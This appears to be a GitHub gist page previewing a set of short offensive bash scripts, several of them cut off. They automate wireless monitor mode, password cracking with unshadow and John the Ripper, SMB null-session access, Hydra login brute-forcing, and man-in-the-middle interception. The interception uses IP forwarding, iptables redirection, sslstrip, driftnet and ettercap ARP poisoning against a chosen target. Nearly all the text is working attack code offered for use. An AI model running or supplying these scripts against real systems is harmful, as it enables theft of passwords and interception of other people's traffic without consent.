This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Script by ScZi | |
#Rename script to filename.sh | |
#Give script execute permissions via following line | |
#chmod 755 filename.sh | |
#First part, put in the interface you want to monitor i.e. wlan0, eth0, etc | |
echo What interface would you like to monitor on? | |
read INTERFACE | |
airmon-ng start $INTERFACE | |
#Spoof MAC Address |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
echo "This script is for unshadowing and cracking *Nix passwords, using Johns wordlist. Where is the passwd file? " | |
read PASSWD | |
clear | |
echo "Where is the unshadowed file? " | |
read UNSHADOWED | |
clear | |
echo "What would you like the saved file to be named? (Optional, add directory) " | |
read NAME | |
clear |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
echo "This script is for unshadowing and cracking *Nix passwords, using Johns wordlist. Where is the passwd file? " | |
read PASSWD | |
echo "Where is the unshadowed file? " | |
read UNSHADOWED | |
echo "What would you like the saved file to be named? (Optional, add directory) " | |
read NAME | |
unshadow $PASSWD $UNSHADOWED > $NAME | |
john --wordlist=/usr/share/john/password.lst $NAME | |
john --show $NAME |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
echo "Please wait while we make sure the following services are started: POSTGRESQL, METASPLOIT, NESSUS, IP Forwarding" | |
echo "Starting POSTGRESQL" | |
service postgresql start > /dev/null 2>&1 | |
echo "Starting Metasploit" | |
service metasploit start > /dev/null 2>&1 | |
echo "Starting Nessus" | |
/etc/init.d/nessusd start > /dev/null 2>&1 | |
echo "Setting up IP Forwarding" | |
echo 1 > /proc/sys/net/ipv4/ip_forward |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
echo "This utility will help you add IP routes. Would you like to continue? [y/n]" | |
read ANS | |
if [ $ANS == "n" ] | |
then | |
echo "Now Exiting..." | |
sleep 5 | |
exit | |
else | |
echo "What gateway do you want to route the traffic through?" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
echo "Please enter network share in which you'd like to connect to for a null session: " | |
read SHARE | |
echo "Please enter host: " | |
read HOST | |
echo "Please wait..." | |
smbclient \\\\$HOST\\$SHARE -N -U''* |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
echo "This script uses HYDRA to crack network authenication..." | |
echo "Please enter location of the list of usernames (default is /usr/share/ncrack/minimal.usr): " | |
read USERLIST | |
echo "Please enter the password list you would like to use (default is /usr/share/seclists/Passwords/rockyou-15.txt): " | |
ls "/usr/share/seclists/Passwords" | |
read PASSLIST | |
echo "Please enter service that you'd like to attack: " | |
read SERVICE | |
echo "Please enter host name: " |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
echo "Please enter the IP of the database in which you would like to connect: " | |
read DB | |
echo "Please enter username: " | |
read USER | |
echo "Please enter password: " | |
read PASSWORD | |
echo "Thank you, please wait.... " | |
mysql -h $DB -u $USER -p$PASSWORD |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
echo 1 > /proc/sys/net/ipv4/ip_forward | |
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 | |
sslstrip -l 8080 & xterm -e driftnet -i wlan0 -b & xterm -e ettercap -Tqi wlan0 -M arp:remote // // |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
echo 1 > /proc/sys/net/ipv4/ip_forward | |
echo "Please enter interface: " | |
read INTERFACE | |
echo "Whos traffic do you want to intercept? " | |
read TARGET | |
echo "What site are you targeting? " | |
read SITE | |
echo "Stand by, preparing to poison target.... " | |
sleep 5 |
NewerOlder